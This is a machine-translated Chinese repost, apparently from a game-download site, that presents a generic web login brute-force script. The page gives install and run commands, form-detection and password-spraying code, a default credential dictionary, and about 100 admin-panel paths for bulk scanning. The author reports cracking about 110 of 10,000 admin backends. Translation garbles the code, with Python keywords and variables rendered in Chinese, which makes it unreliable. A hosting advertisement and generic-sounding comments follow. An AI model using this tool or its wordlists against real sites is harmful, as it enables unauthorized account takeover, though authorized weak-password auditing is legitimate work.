游戏迷提供最新游戏下载和手游攻略!

Web弱密码通用检测方法研究

发布时间:2024-10-17浏览:74

大家好,今天来为大家分享Web弱密码通用检测方法研究的一些知识点,和的问题解析,大家要是都明白,那么可以忽略,如果不太清楚的话可以看看本篇文章,相信很大概率可以解决您的问题,接下来我们就一起来看看吧!

随着攻防演练和一些漏洞挖掘任务的增多,有时需要快速大批量地检测一些网站的后台安全情况,尤其是测试一些管理弱口令。这种简单但耗时耗力的工作需要自动化系统。剧本完成了。然而,目前的网页密码破解工具大多是针对某种cms设计的,或者像burpsuite一样需要手动配置。没有通用的破解工具。

所以就有了这个小工具——通用网页弱口令破解脚本,结合另一个信息收集工具

https://github.com/TideSec/FuzzScanner 可以快速批量刷分。

安装与使用

安装和使用都比较简单:

从Github 拉取

git clone https://github.com/TideSec/web_pwd_common_crack 安装requirements.txt依赖项

pip install -rrequirements.txt 只需运行脚本

python web_pwd_crack.py url.txt 50 --url.txt是要扫描的URL地址列表,50是线程数,默认是50。url.txt是要检测的URL地址。你可以编写脚本从搜索引擎批量获取,也可以自己使用目录枚举工具来收集。

功能原理

1、访问目标地址并分析关键词

原理很low,就是从页面中提取表单,检索表单中的内容,如果有用户名、密码、用户名、pwd、pass等字段,则认为是登录页面,然后提取参数形成数据发送给破解函数进行破解。

由于各个网站请求包的多样性,目前无法像wvs那样提取所有登录帖子。它只是根据简单的关键字提取的。

logins=['用户名','密码','登录','登鲁','登录','用户','通行证','永虎','米玛','密码','张浩','永虎' ,'name','email','account']在测试过程中我们也发现有时搜索框会对结果产生干扰,所以我们排除了搜索框。

sous=['search','search','search','find','keyword','keyword'] 另外,目前不支持验证码自动识别,所以验证码也排除在外。

yzms=['验证码', '点击更改', '点击刷新', 'checkcode', 'valicode', 'code', 'captcha'] 2.通过解析页面获取发帖地址及参数

def get_post_get_page(content,url): form_action=str(content).split('\n')[0] # print form_action soup=BS(form_action, 'lxml') url_path='' for x in re.findall(' .*?/',url): url_pathurl_path=url_path+x action_url=soup.form['action'] if str(action_url).startswith('http'): path=action_url else: path=url_path+soup.form[' action'] method=soup.form['method'] 返回路径,method3。获取相关参数和路径后,调用破解函数web_crack破解密码

def web_crack(方法,路径,数据): conn=requests.session() res0=conn.get(路径,headers=requests_headers(),allow_redirects=False,超时=10,proxies=requests_proxies()) error_length,cookie_error_flag,dynamic_req_len=get_error_length(conn,method,path,data) ifdynamic_req_len: return False,False num=0 success_flag=0 dic_all=len(USERNAME_DIC)*len(PASSWORD_DIC) for user_name in USERNAME_DIC: for pass_word in PASSWORD_DIC: datadata1=data # 打印data1 user_nameuser_name=user_name.strip() pass_wordpass_word=pass_word.strip() pass_word=str(pass_word.replace('{user}', user_name)) data2=str(data1.replace('%7Buser_name%7D', user_name)) data2=str (data2.replace('%7Bpass_word%7D', pass_word)) numnum=num+1 res=conn.post(url=path,data=data2, headers=requests_headers(), timeout=10,verify=False,allow_redirects=False,proxies=requests_proxies()) cur_length=len(res.content+str(res.headers)) if cookie_error_flag: # cookie_error_flag表示每个数据包中有cookie if cur_length!=error_length: success_flag=1 return user_name,pass_word elif ' Set res.headers 中的-Cookie' 和cur_length!=error_length: success_flag=1 return user_name,pass_word if success_flag==0: return False,False 配置了一个比较简单的字典

USERNAME_DIC=['admin','guest','test','ceshi','system'] PASSWORD_DIC=['123456','admin','密码','123123','123','1', '{user}','{user}{user}','{user}1','{user}123','{user}2018','{user}2017','{user}2016', '{user}2015','{user}!','P@ssw0rd!','qwa123','12345678','测试','123qwe!@#','123456789','123321',' 1314520','666666','woaini','000000','1234567890','8888888','qwerty','1qaz2wsx','abc123','abc123456','1q2w3e4r','123qwe','a123456' '123123123'、'123456.'、'0123456789'、'asd123456'、'aa123456'、'q123456789'、'!QAZ@WSX'、'12345'、'1234567'、'passw0rd'、'admin888'] 4.如何判断破解是否成功

目前采用多种方法相互结合进行联合验证。

通过返回包中是否有Set-Cookie;返回数据包的长度变化;使用requests.session()进行重新认证;并返回匹配的页面内容。优化了准确度,增加了复查功能。测试时发现误报,因此重新验证成功的账户密码。例如:

有些系统多次检测后会屏蔽IP地址,这会干扰破解脚本的判断;有些系统一开始不会有验证码,但几次错误后就会出现验证码;有些系统会有提示信息随机发生变化,导致误报。工作界面

扫描过程如下

扫描成功的结果将保存在web_crack_ok.txt文件中

扫描过程中识别到的验证码、phpmyadmin等所有日志都会保存在web_crack_log.txt文件中,后续可以根据日志日志进行一一筛选。

其他说明

其实在完成这个工具之后,我开始明白为什么市面上没有万能的破解器了,因为成功率确实不高!我测试了10000个管理后台,破解了大约110个弱密码。目前尚不清楚是否有遗漏,但基本不存在误报。

成功率低的主要原因有:

网页类型复杂,难以准确获取并提交正确的参数;很多页面都有验证码,目前这个小脚本无法自动识别验证码;为了平衡时间和效率,使用了相对简单的用户名和密码字典,因此稍微复杂的密码无法被破解。我通常使用dirsearch或者类似的目录枚举工具配置一个相对轻量级的管理后端目录字典,批量扫描管理后端中的目标地址,然后使用web_pwd_crack.py对这些后端地址批量破解弱密码。

贡献一本比较精简的管理后台词典(100条)

admin/default/login.asp admin/login.asp admin/manage/login.asp admin_login/login.asp admincp/login.asp 管理员/login.asp login.asp 管理/login.asp 经理/login.asp 成员/login .asp admin-login.php admin/admin-login.php admin/admin_login.php admin/login.php admin2/login.php admin_area/login.php admin_login.php adminarea/login.php admincontrol/login.php 管理员/登录.php adminlogin.php autologin.php bb-admin/login.php blog/wp-login.php checklogin.php login.php modelsearch/login.php 版主/login.php nsw/admin/login.php 页面/admin/admin-login.php panel-administracion/login.php processlogin.php rcjakar/admin/login.php relogin.php siteadmin/login.php sqlbuddy/login.php userlogin.php usuarios/login.php webadmin/login.php wp-login.php 帐户/login.jsp 帐户/login.jsp admin/login.jsp auth/login.jsp jsp/extension/login.jsp 登录.jsp 成员/login.jsp 成员/login.jsp PortalAppAdmin/login.jsp admin.jsp netadmin.jsp admin.php admin.php3 admin/admin.php admin_area/admin.php adminarea/admin.php authadmin.php bb-admin/admin.php checkadmin.php cmsadmin.php dbadmin.php fileadmin.php isadmin .php linusadmin-phpinfo.php memberadmin.php moadmin.php modelsearch/admin.php moderator/admin.php panel-administracion/admin.php phpliteadmin.php siteadmin.php sysadmin.php tmp/admin.php ur-admin.php user /admin.php 用户/admin.php webadmin.php webadmin/admin.php wp-content/plugins/akismet/admin.php admin.asp admin.aspx admin/default/admin.asp admin/manage/admin.asp admin_login/admin.asp 管理员/admin.asp 文章/admin/admin.asp denglu/admin.asp guanli/admin.asp houtai/admin.asp 登录/admin/admin.asp 管理/admin.asp 经理/admin.asp 会员/admin .asp 管理/logon.jsp 管理/安全/logon.jsp 指南针/logon.jsp 登录.jsp 登录/logon.jspToDo

验证码识别降低误报率,优化编码处理,不那么低调。天下数据是国内为数不多的拥有多个海外自建机房的新型IDC服务商之一。被业界公认为“中国IDC行业首选品牌”。

除了提供传统的IDC产品外,天下数据的主要职责是为大中型企业提供更加完善、安全、定制化的满足个性化需求的服务器解决方案,特别是在直销、金融、视频、流媒体、游戏等领域。电子商务。区块链、快消品、物联网、大数据等众多行业,我们可以解决客户在服务器租赁中遇到的各种问题。

用户评论

淡抹烟熏妆丶

这篇文章写的真好!我一直觉得web弱口令是个很大的安全隐患,终于有人认真探讨了这个问题。希望这篇论文能被更多人看到,推动行业的改进。

    有20位网友表示赞同!

安陌醉生

检测弱口令的方法有很多种,但通用性确实是一个难点,作者在这方面做了深入的研究,很有吸引力!尤其对从事网络安全的来说,简直是必读资料啊!

    有12位网友表示赞同!

采姑娘的小蘑菇

作为一名开发人员,我对Web应用程序安全性非常关注。这篇文章提出的方法很有启发性,让我进一步了解了如何评估和改进应用的密码强度。需要好好阅读一下论文原文。

    有14位网友表示赞同!

她的风骚姿势我学不来

弱口令确实是个头疼问题,希望这种通用检测方法能够普及到各个领域,提高整个互联网的安全水平

    有9位网友表示赞同!

惦着脚尖摘太阳

我一直觉得网络安全研究很酷!这篇文章介绍了一种很有创新性的方法来检测弱口令,让我对Web应用程序安全有了更深层次的理解。期待作者后续的研究成果!

    有8位网友表示赞同!

一点一点把你清空

对于非技术人员来说,这份论文可能有些难懂,最好能配上一些通俗易懂的解释和案例,这样更多人才能了解这种通用检测方法的重要性。

    有5位网友表示赞同!

空谷幽兰

我觉得弱口令检测应该不仅仅局限于Web应用,各个系统和设备都应该重视密码安全。希望未来的研究能够扩展到其他领域。

    有5位网友表示赞同!

凉城°

虽然作者提出了一个通用的检测方法,但我还是担心实际应用中可能存在一些误判的风险?还需要更多的实践测试和验证。

    有16位网友表示赞同!

坏小子不坏

这篇文章很有实用价值,如果能结合一些常见的Web应用程序平台,提供具体的漏洞扫描工具,那将是真正的福音!

    有13位网友表示赞同!

嗯咯

对于我一个普通用户来说,文章中的技术细节比较抽象,希望能有更加直观的解释,以便我更好地了解弱口令的危害以及如何加强个人网络安全意识。

    有17位网友表示赞同!

伤离别

检测弱口令只是治标不治本,更应该从设计端加强密码强度要求,引导用户使用更安全的密码策略才是长久之计。

    有5位网友表示赞同!

我就是这样一个人

这篇文章很有深度!作者对弱口令的定义和分类都进行了比较全面的分析,让我对这个话题有了更深入的理解.

    有5位网友表示赞同!

醉枫染墨

作为一名网络安全爱好者,一直关注弱口令的研究进展,这次作者提出的通用检测方法令我感到期待,希望能看到更多实际应用案例!

    有12位网友表示赞同!

陌颜幽梦

这篇文章有点枯燥,对于新手来说可能很难读懂。建议加入一些图片、图表等辅助内容,提升文章的可读性。

    有8位网友表示赞同!

日久见人心

这篇文章让我意识到弱口令的问题是多么普遍!我们需要提高警惕,保护好我们的网络安全!

    有20位网友表示赞同!

熏染

我觉得这个研究方向很不错,但是实际应用中还需要考虑很多因素,比如检测效率、false positive rate等等。希望能看到更深入的研究和实践成果。

    有9位网友表示赞同!

*巴黎铁塔

对弱口令的通用检测方法我一直比较感兴趣,这篇文章很好的总结了现有的研究进展,让我受益匪浅!希望作者后续能做一些应用场景下的详细分析。

    有18位网友表示赞同!

夏日倾情

文章内容专业性很强,对于从事网络安全的同学来说很有参考价值。不过对于非专业的读者来说,可能有部分内容比较难理解.

    有13位网友表示赞同!

热点资讯